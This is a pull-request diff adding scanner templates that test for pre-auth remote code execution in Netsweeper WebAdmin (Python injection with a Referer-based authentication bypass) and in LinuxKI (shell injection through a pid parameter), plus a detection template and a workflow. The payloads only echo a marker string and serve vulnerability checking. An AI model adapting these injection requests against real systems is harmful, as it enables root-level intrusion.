Merge pull request #219 from dwisiswant0/add-cves-and-workflows

Add CVE-2020-13167, CVE-2020-7209 & Workflows

cves/CVE-2020-13167.yaml

@@ -0,0 +1,41 @@
+id: CVE-2020-13167
+
+info:
+  name: Netsweeper WebAdmin unixlogin.php Python Code Injection
+  author: dwisiswant0
+  severity: critical
+
+  # This template exploits a Python code injection in the Netsweeper
+  # WebAdmin component's unixlogin.php script, for versions 6.4.4 and
+  # prior, to execute code as the root user.
+
+  # Authentication is bypassed by sending a random whitelisted Referer
+  # header in each request.
+
+  # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
+  # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
+  # been confirmed exploitable.
+
+  # References:
+  # - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
+  # - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
+
+requests:
+  - method: GET
+    path:
+      # Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/nonexistent
+      - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6e6f6e6578697374656e74%27.decode%28%27hex%27%29%29%23&timeout=5"
+      - "{{BaseURL}}/webadmin/nonexistent"
+    headers:
+      Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
+      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
+      Connection: "close"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "nonexistent"
+        part: body
+      - type: status
+        status:
+          - 200

cves/CVE-2020-7209.yaml

@@ -0,0 +1,27 @@
+id: CVE-2020-7209
+
+info:
+  name: LinuxKI Toolset 6.01 Remote Command Execution
+  author: dwisiswant0
+  severity: critical
+
+  # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
+  # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+
+  # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
+    headers:
+      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "nonexistent"
+        part: body
+      - type: status
+        status:
+          - 200

technologies/netsweeper-webadmin-detect.yaml

@@ -0,0 +1,26 @@
+id: netsweeper-webadmin-detect
+
+info:
+  name: Netsweeper WebAdmin detected
+  author: dwisiswant0
+  severity: informative
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webadmin/start/"
+      - "{{BaseURL}}/webadmin/tools/systemstatus_remote.php"
+    headers:
+      Referer: "http://{{Hostname}}/webadmin/admin/systemstatus_inc_data.php"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "Version: ([\\d.]+)"
+          - "Powered by netsweeper"
+          - "Netsweeper Inc"
+        condition: or
+        part: body
+      - type: status
+        status:
+          - 200

workflows/netsweeper-preauth-rce-workflow.yaml

@@ -0,0 +1,15 @@
+id: netsweeper-preauth-rce-workflow
+
+info:
+  name: Netsweeper PreAuth RCE Workflow
+  author: dwisiswant0
+
+variables:
+  netsweeper_webadmin: technologies/netsweeper-webadmin-detect.yaml
+  netsweeper_webadmin_cve_1: cves/CVE-2020-13167.yaml
+
+logic:
+  |
+  if netsweeper_webadmin() {
+    netsweeper_webadmin_cve_1()
+  }